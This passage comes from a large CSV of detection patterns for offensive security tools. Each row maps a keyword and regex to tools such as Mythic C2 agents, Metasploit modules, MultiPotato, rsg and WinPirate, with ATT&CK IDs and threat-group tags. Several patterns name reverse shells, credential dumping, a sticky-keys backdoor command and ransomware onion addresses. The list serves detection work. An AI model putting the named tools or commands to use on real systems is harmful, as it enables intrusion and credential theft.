MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","52500" "*mssqlsvc.kirbi*",".{0,1000}mssqlsvc\.kirbi.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52501" "*msv7eaydbdue7x6hos2kzbtwgoi7xmtuddlqgniqghs3qc54wajudwad.onion*",".{0,1000}msv7eaydbdue7x6hos2kzbtwgoi7xmtuddlqgniqghs3qc54wajudwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52502" "*MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo*","MTE2NTc2MDM5MjY5NDM1NDA2MA\.GRSNK7\.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - 
TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","52503" "*mthbernardes*rsg*",".{0,1000}mthbernardes.{0,1000}rsg.{0,1000}","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","Resource Development","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","N/A","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","52504" "*mthbernardes/rsg*",".{0,1000}mthbernardes\/rsg.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","52505" "*mttaggart/OffensiveNotion*",".{0,1000}mttaggart\/OffensiveNotion.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","52506" "*mtth-bfft/adeleg*",".{0,1000}mtth\-bfft\/adeleg.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","52507" "*mufeedvh/moonwalk*",".{0,1000}mufeedvh\/moonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","52508" "*multi_meter_inject.rb*",".{0,1000}multi_meter_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52510" "*multi_vendor_cctv_dvr_pass*",".{0,1000}multi_vendor_cctv_dvr_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52511" "*multibit2john.py*",".{0,1000}multibit2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52512" "*MultiPotato.cpp*",".{0,1000}MultiPotato\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52513" "*MultiPotato.exe*",".{0,1000}MultiPotato\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52514" "*MultiPotato-main*",".{0,1000}MultiPotato\-main.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52515" "*mustafashykh/router-scan*",".{0,1000}mustafashykh\/router\-scan.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","52516" "*--mutator N*",".{0,1000}\-\-mutator\sN.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","52517" "*mutator.py *",".{0,1000}mutator\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","52518" "*mv ""/media/windows/Windows/System32/sethc.exe"" ""/media/windows/Windows/System32/*",".{0,1000}mv\s\""\/media\/windows\/Windows\/System32\/sethc\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","52519" "*mv *.ccache *.ccache*",".{0,1000}mv\s.{0,1000}\.ccache\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP 
Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","52520" "*mvelazc0/BadZure*",".{0,1000}mvelazc0\/BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","52522" "*-my.sharepoint.com/personal/Fakeuser*",".{0,1000}\-my\.sharepoint\.com\/personal\/Fakeuser.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","52523" "*-my.sharepoint.com/personal/TESTUSER_*",".{0,1000}\-my\.sharepoint\.com\/personal\/TESTUSER_.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","network exploitation tool","N/A","7","663","83","2025-04-17T00:13:11Z","2019-03-05T08:54:38Z","52524" "*my_dump_my_pe*",".{0,1000}my_dump_my_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","52525" "*MY_MESSAGE ""I did it for the vine.""*",".{0,1000}MY_MESSAGE\s\""I\sdid\sit\sfor\sthe\svine\.\"".{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","52526" "*mybmtbgd7aprdnw2ekxht5qap5daam2wch25coqerrq2zdioanob34ad.onion*",".{0,1000}mybmtbgd7aprdnw2ekxht5qap5daam2wch25coqerrq2zdioanob34ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52527" "*MyMeterpreter.ps1*",".{0,1000}MyMeterpreter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52528" "*myosbja7hixkkjqihsjh6yvmqplz62gr3r4isctjjtu2vm5jg6hsv2ad.onion*",".{0,1000}myosbja7hixkkjqihsjh6yvmqplz62gr3r4isctjjtu2vm5jg6hsv2ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52529" "*myreallycooltotallyrealtenant.onmicrosoft.com*",".{0,1000}myreallycooltotallyrealtenant\.onmicrosoft\.com.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing 
messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","52530" "*myseatbelt.py*",".{0,1000}myseatbelt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","52531" "*mysql -u* -p c2 < c2_sample.sql*",".{0,1000}mysql\s\-u.{0,1000}\s\-p\sc2\s\<\sc2_sample\.sql.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","52532" "*mysql_authbypass_hashdump.rb*",".{0,1000}mysql_authbypass_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52533" "*mysql_file_enum.rb*",".{0,1000}mysql_file_enum\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52534" "*mysql_hashdump.rb*",".{0,1000}mysql_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52535" "*mysql-privesc-race.c*",".{0,1000}mysql\-privesc\-race\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","52536" "*Mystikal-main*",".{0,1000}Mystikal\-main.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","52537" "*mythic_c2_container*",".{0,1000}mythic_c2_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52538" "*mythic_nginx*",".{0,1000}mythic_nginx.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red 
teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52539" "*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52540" "*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52541" "*mythic_payloadtype_container*",".{0,1000}mythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52542" "*mythic_rest.Payload*",".{0,1000}mythic_rest\.Payload.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - 
T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52543" "*mythic_service.py*",".{0,1000}mythic_service\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52544" "*mythic_translator_containter*",".{0,1000}mythic_translator_containter.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52545" "*MythicAgents/Apollo*",".{0,1000}MythicAgents\/Apollo.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","52546" "*MythicAgents/Athena*",".{0,1000}MythicAgents\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52547" "*MythicAgents/merlin*",".{0,1000}MythicAgents\/merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","52548" "*MythicAgents/tetanus*",".{0,1000}MythicAgents\/tetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","N/A","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","52549" "*MythicAgents/thanatos*",".{0,1000}MythicAgents\/thanatos.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","52550" "*mythic-cli *",".{0,1000}mythic\-cli\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - 
T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52551" "*mythic-cli*athena*",".{0,1000}mythic\-cli.{0,1000}athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52552" "*MythicClient.cs*",".{0,1000}MythicClient\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 